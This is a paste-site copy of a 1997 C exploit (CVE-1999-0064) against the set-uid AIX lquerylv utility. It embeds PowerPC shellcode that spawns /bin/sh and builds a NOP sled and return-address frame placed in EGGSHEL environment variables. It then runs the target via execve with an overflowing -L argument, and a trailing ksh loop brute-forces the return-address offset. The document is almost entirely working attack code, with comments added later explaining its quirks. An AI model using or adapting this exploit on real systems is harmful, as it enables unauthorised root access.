FlyFar

AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation - CVE-1999-0064

May 17th, 2024
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5.  
/* Path of the set-uid target handed to execve(), and the argv[0] used for it.
   Fixed-size arrays, as in the original; only the string contents are used. */
char prog[100]  = "/usr/sbin/lquerylv";
char prog2[30]  = "lquerylv";

/* Old-style (unprototyped) declaration: main() only takes the address of
   execv, it never calls it through this name. */
extern int execv();
  9.  
/*
 * Build a heap string "name=value", install it with putenv() and return it.
 *
 * putenv() stores the pointer itself rather than a copy, so the returned
 * buffer is owned by the environment and must not be freed by the caller.
 * On allocation failure a message is printed and the process exits with
 * status 2.  Both arguments must be non-NULL: strlen() is applied to each.
 */
char *createvar(char *name,char *value)
{
    /* '=' plus terminator need 2 bytes; the original reserves 4. */
    size_t need = strlen(name) + strlen(value) + 4;
    char *entry = malloc(need);

    if (entry == NULL) {
        perror("error allocating");
        exit(2);
    }

    /* 'need' always exceeds the formatted length, so this never truncates
       and yields exactly what strcpy/strcat would have produced. */
    snprintf(entry, need, "%s=%s", name, value);
    putenv(entry);

    return entry;
}
  22.  
  23. /*The program*/
/*
 * Historical proof-of-concept for the AIX lquerylv overflow (CVE-1999-0064,
 * as the page title gives it), kept in its 1997 form.  Everything is
 * hard-wired to one AIX build: the embedded machine code, the layout
 * constants mn/max and the return-address correction corr (overridable via
 * argv[1]; the ksh loop in the trailing comment sweeps it).  Written
 * pre-C99: main() has no declared return type, the env parameter is unused,
 * and execve()/putenv()/execv are used without <unistd.h>, so modern
 * compilers warn on or reject the file unchanged.
 */
main(int argc,char **argv,char **env)
{
/*The code*/
/* PowerPC machine code, one 32-bit word per entry, 0-terminated so that
   strlen() on it below yields its byte length (no word may contain a zero
   byte).  Four halfwords in it are patched at run time from the two words
   read out of execv's function descriptor (toc/eco below). */
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6        mfspr   r0,LR
9421fbb0        stu     SP,-1104(SP) --get stack
90010458        st      r0,1112(SP)
3c60f019        cau     r3,r0,0xf019 --CTR
60632c48        lis     r3,r3,11336  --CTR
90610440        st      r3,1088(SP)
3c60d002        cau     r3,r0,0xd002 --TOC
60634c0c        lis     r3,r3,19468  --TOC
90610444        st      r3,1092(SP)
3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
6063696e        lis     r3,r3,26990
90610438        st      r3,1080(SP)
3c602f73        cau     r3,r0,0x2f73
60636801        lis     r3,r3,26625
3863ffff        addi    r3,r3,-1
9061043c        st      r3,1084(SP) --terminate with 0
30610438        lis     r3,SP,1080
7c842278        xor     r4,r4,r4    --argv=NULL
80410440        lwz     RTOC,1088(SP)
80010444        lwz     r0,1092(SP) --jump
7c0903a6        mtspr   CTR,r0
4e800420        bctr              --jump
*/

#define MAXBUF 600
/* buf: sled words, then code, then repeated return addresses; exported
   through the EGGSHEL* environment variables.
   frame: repeated return addresses only; passed as the value of -L. */
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;        /* when set: write buf to stdout and exit, no execve */
int dobuf=0;        /* dobuf, t and ch are declared but never used below */
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=4600;
char *args[4];      /* args[3] is never assigned (see the execve call) */
char *arg1="-L";
char *newenv[8];
int startwith=0;    /* constant 0 here: the sled is filled with NOP words */

mn=100;     /* number of sled words placed before the code */
max=280;    /* number of words written into buf and frame */

if (argc>1)
        corr = atoi(argv[1]);   /* atoi(): no error reporting on bad input */

/* Read the two words of execv's function descriptor through a plain
   unsigned pointer (an aliasing cast); both are patched into code[]. */
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;

/* Layout sanity check.  perror() appends strerror(errno) although no
   library call failed here, so the suffix is whatever errno holds.
   max == MAXBUF passes this test, yet buf[max+1] is written further down. */
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
        perror("Bad parameters");
        exit(1);
}

/* Patch the 16-bit immediates of the two cau/lis pairs in code[] with the
   words read above.  OO is a halfword (unsigned short) index into code[]. */
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);

/* Target address = address of this process's own buf[] plus corr; it only
   makes sense if the victim's stack layout matches this process's. */
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;

for(nop=0;nop<mn;nop++)
 buf[nop]=startwith ? reta : 0x4ffffb82;        /*NOP*/
/* Copies code[] including its terminating zero byte; i then indexes the
   last code word. */
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;

/* '&&' is the logical operator: with reta non-zero the last three terms are
   always true, so effectively only the lowest byte of reta is tested. */
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
        || !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}

/* Post-increment in the condition: the loop exits with i == max+1. */
while(i++<max)
 buf[i]=reta;
buf[i]=0;

for(i=0;i<max-1;i++)
 frame[i]=reta;
frame[i]=0;

if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};

/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);


/* getenv() returns NULL when DISPLAY is unset; createvar() then calls
   strlen() on that NULL pointer. */
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;

args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
/* args[3] was never set, so argv is not reliably NULL-terminated; envp is
   terminated by newenv[5].  execve() only returns on failure. */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/*      Georgi Guninski
        guninski@hotmail.com
        sgg@vmei.acad.bg
        guninski@linux2.vmei.acad.bg
        http://www.geocities.com/ResearchTriangle/1711
*/
}
  148. /*
  149. ----------cut here---------
  150. ----------sometimes this helps-----------------
  151. #!/bin/ksh
  152. L=100
  153. O=40
  154. while [ $L -lt 12000 ]
  155. do
  156. echo $L
  157. L=`expr $L + 42`
  158. ./a.out $L
  159. done */
  160.  
  161. // milw0rm.com [1997-05-26]
  162.            